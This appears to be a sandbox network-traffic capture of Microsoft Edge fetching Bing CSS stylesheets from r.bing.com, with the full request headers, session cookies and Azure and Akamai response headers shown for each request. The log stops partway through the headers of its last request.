User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 478
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Sun, 21 Nov 2010 23:55:20 GMT
X-EventID: 66f771ac6f9649a59ed1a771c2a2719e
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E0AA
X-AS-SuppressSetCookie: 1
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-59et3TDAPcH27+WwH8PEn0vYS0QEi0BSwJUfQd0d0dE='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=229614
Expires: Tue, 08 Oct 2024 07:52:43 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f0a1ef3
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/oI5RhkwetxuVgfOww-Nc0yTFfkU.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/oI5RhkwetxuVgfOww-Nc0yTFfkU.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 57
Content-Type: text/css
Content-Encoding: br
Content-MD5: HxTYuzm+bBlqMabY5Pojtg==
Last-Modified: Tue, 24 Sep 2024 06:59:15 GMT
ETag: 0x8DCDC66670B5061
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4f92b9ee-b01e-004c-4e71-152d8f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=232932
Expires: Tue, 08 Oct 2024 08:48:01 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f0a202c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/GwvTDzr-_7Ipq8Y_s09cnrmtIeY.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/GwvTDzr-_7Ipq8Y_s09cnrmtIeY.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 117
Content-Type: text/css
Content-Encoding: br
Content-MD5: ok6k2YChhrCNuY7rU1krKw==
Last-Modified: Tue, 24 Sep 2024 06:06:54 GMT
ETag: 0x8DCDC5F1718443B
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 101f53ac-001e-005e-75db-151993000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=278583
Expires: Tue, 08 Oct 2024 21:28:53 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2175
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/cttnJ0tPw4WhtII_MMcYEf1T5wE.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/cttnJ0tPw4WhtII_MMcYEf1T5wE.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 303
Content-Type: text/css
Content-Encoding: br
Content-MD5: 2Rs5ewEe41aTQO8IM3AeLw==
Last-Modified: Tue, 24 Sep 2024 06:42:31 GMT
ETag: 0x8DCDC64107E8524
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d2829b3b-a01e-0058-39a2-14eeeb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=144241
Expires: Mon, 07 Oct 2024 08:09:51 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2348
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rb/5W/cc,nc/GZY3PyHImAjt56VIC2PBbIGPof4.css?bu=Ad0b&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/5W/cc,nc/GZY3PyHImAjt56VIC2PBbIGPof4.css?bu=Ad0b&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 467
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Mon, 23 Sep 2024 23:06:07 GMT
X-EventID: 66fe350126254047b317ef33b15f5118
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E0D3
X-AS-SuppressSetCookie: 1
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
Cache-Control: public, max-age=223289
Expires: Tue, 08 Oct 2024 06:06:58 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097317
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/HnTisSbDqDcynvZ6icoKs1zYGQE.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/HnTisSbDqDcynvZ6icoKs1zYGQE.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 307
Content-Type: text/css
Content-Encoding: br
Content-MD5: l0w0ONIpmvXe4cEuyYB9Bw==
Last-Modified: Tue, 24 Sep 2024 06:08:19 GMT
ETag: 0x8DCDC5F49AF3FAD
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5e4292ce-801e-004f-439c-142e88000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=141846
Expires: Mon, 07 Oct 2024 07:29:35 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f09731d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/WPdUF5dLCtutNLHF5Ld5b54Ssjg.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/WPdUF5dLCtutNLHF5Ld5b54Ssjg.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 288
Content-Type: text/css
Content-Encoding: br
Content-MD5: E4VlpHghrgd+BUM8airmig==
Last-Modified: Tue, 24 Sep 2024 06:30:58 GMT
ETag: 0x8DCDC6273E948D6
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 29a38512-a01e-0017-27d4-142af3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.ab777b5c.1728115835.f5dd2b4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=165864
Expires: Mon, 07 Oct 2024 14:09:53 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097439
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/HCr-NzLR4hN0cooQ6Hk3WYStjdE.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/HCr-NzLR4hN0cooQ6Hk3WYStjdE.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
